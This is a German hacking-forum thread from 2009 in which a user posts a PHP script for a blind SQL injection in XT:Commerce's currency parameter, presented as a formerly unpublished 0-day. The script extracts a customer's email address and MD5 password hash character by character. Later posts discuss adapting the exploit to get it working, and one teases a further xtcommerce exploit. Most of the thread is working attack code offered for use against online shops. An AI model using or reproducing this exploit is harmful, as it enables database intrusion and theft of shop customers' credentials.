XT:Commerce < v3.0.4 SP2.1 Currency.Class SQL Injection Vulnerability

//ins0.! · 22. Februar 2009

Dieser Exploit war nonpub ... die SicherheitslÃ¼cke wurde von XT Commerce erst sehr spÃ¤t endeckt ,
Und ich kenne bis jetzt keinen Public gewordenen Exploit. Also ist meiner quasi noch nonpub...

der code ist kein vorschaucode ...

greez ins0

[HIDE]

PHP

#!/usr/bin/php -q
<?php
/*************************************************************************
* XT:Commerce < v3.0.4 SP2.1 Currency.Class SQL Injection Vulnerability *
* 2008 //ins0.! - 0-day development *
*************************************************************************/
$alpha_low = array( '.',
'@',
'a',
'b',
'c',
'd',
'e',
'f',
'g',
'h',
'i',
'j',
'k',
'l',
'm',
'n',
'o',
'p',
'q',
'r',
's',
't',
'u',
'v',
'w',
'x',
'y',
'z');
$numbers = array( '0',
'1',
'2',
'3',
'4',
'5',
'6',
'7',
'8',
'9');
$correct_chars = '';
$md5_string = '';
for($x = 0; $x < count($alpha_low); $x++){
$char_string = $correct_chars.ord($alpha_low[$x]).',';
$query_string = "http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(".$char_string."37))/*&manufacturers_id='";
$source = file_get_contents($query_string);
if(preg_match('#EUR#iU', $source) == 0){
$correct_chars .= ord($alpha_low[$x]).',';
$md5_string .= $alpha_low[$x];
echo ">>>>> FOUND -> '".$alpha_low[$x]."' MD5 = ".$md5_string."\r\n\r\n\r\n";
$x = -1;
continue;
}else{
echo '\''.$alpha_low[$x].'\' => '.preg_match('#EUR#iU', $source)."\r\n";
}
if($x == 27){
for($y = 0; $y < count($numbers); $y++){
$char_string = $correct_chars.ord($numbers[$y]).',';
$query_string = "http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_password+LIKE+CHAR(".$char_string."37))/*&manufacturers_id='&date=".time();
$source = file_get_contents($query_string);
if(preg_match('#EUR#iU', $source) == 0){
$correct_chars .= ord($numbers[$y]).',';
$md5_string .= $numbers[$y];
echo ">>>>> FOUND -> '".$numbers[$y]."' MD5 = ".$md5_string."\r\n\r\n\r\n";
$y = 15;
}else{
echo '\''.$numbers[$y].'\' => '.preg_match('#EUR#iU', $source)."\r\n";
}
}
$x = -1;
}
}
echo "\r\n\r\n\r\n";
echo ">>>> Break! MD5: => ".$md5_string."\r\n";
?>

Alles anzeigen

[/HIDE]

Der Code ist funktionstÃ¼chig und fÃ¼r PW + Email geeignet jedoch muss er angepasst werden.#

whit3 · 26. Februar 2009

das einzige was das teil liefert is

Code

'.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 ' ...

//ins0.! · 26. Februar 2009

jo und das is auch richtig

Zitat: "Der Code ist funktionstÃ¼chig und fÃ¼r PW + Email geeignet jedoch muss er angepasst werden."

Guck dir die Source an und du versteht was der Code eigentlich macht ....

//edit

Wenn du verstehst was der Code eigentlich macht ihn angepasst hast dann funzt er....

bsp:

Code

'.' => 1
'@' => 1
'a' => 1
'b' => 1
'c' => 1
'd' => 1
'e' => 1
'f' => 1
'g' => 1
'h' => 1
'i' => 1
'j' => 1
'k' => 1
'l' => 1
>>>>> FOUND -> 'm' MD5 = m

Alles anzeigen

hast du ihn angepasst und er schmeiÃ?t dir kein "FOUND" raus und wiederholt er sich ... ist er falsch angepasst oder der srv fixed.

//edit 2

das ist der grund warum die lÃ¼cke solange offen war ... wenns nen 0815 exploit wÃ¤hre und jeder ihn tot usen wÃ¼rde

karamble · 3. März 2009

Ich hab hier nochwas vom TÃ¼rken von nebenan

Code

Salaam alaikum wa rahmatullahi wa barakatuh
ben base1001
Size bugÃ¼n, inshaAllah, bir yep yeni Exploit gÃ¶stercem
#############################
ShopSoftware: xtcommerce #
Vulnerability: /coID/ #
#############################

Teilen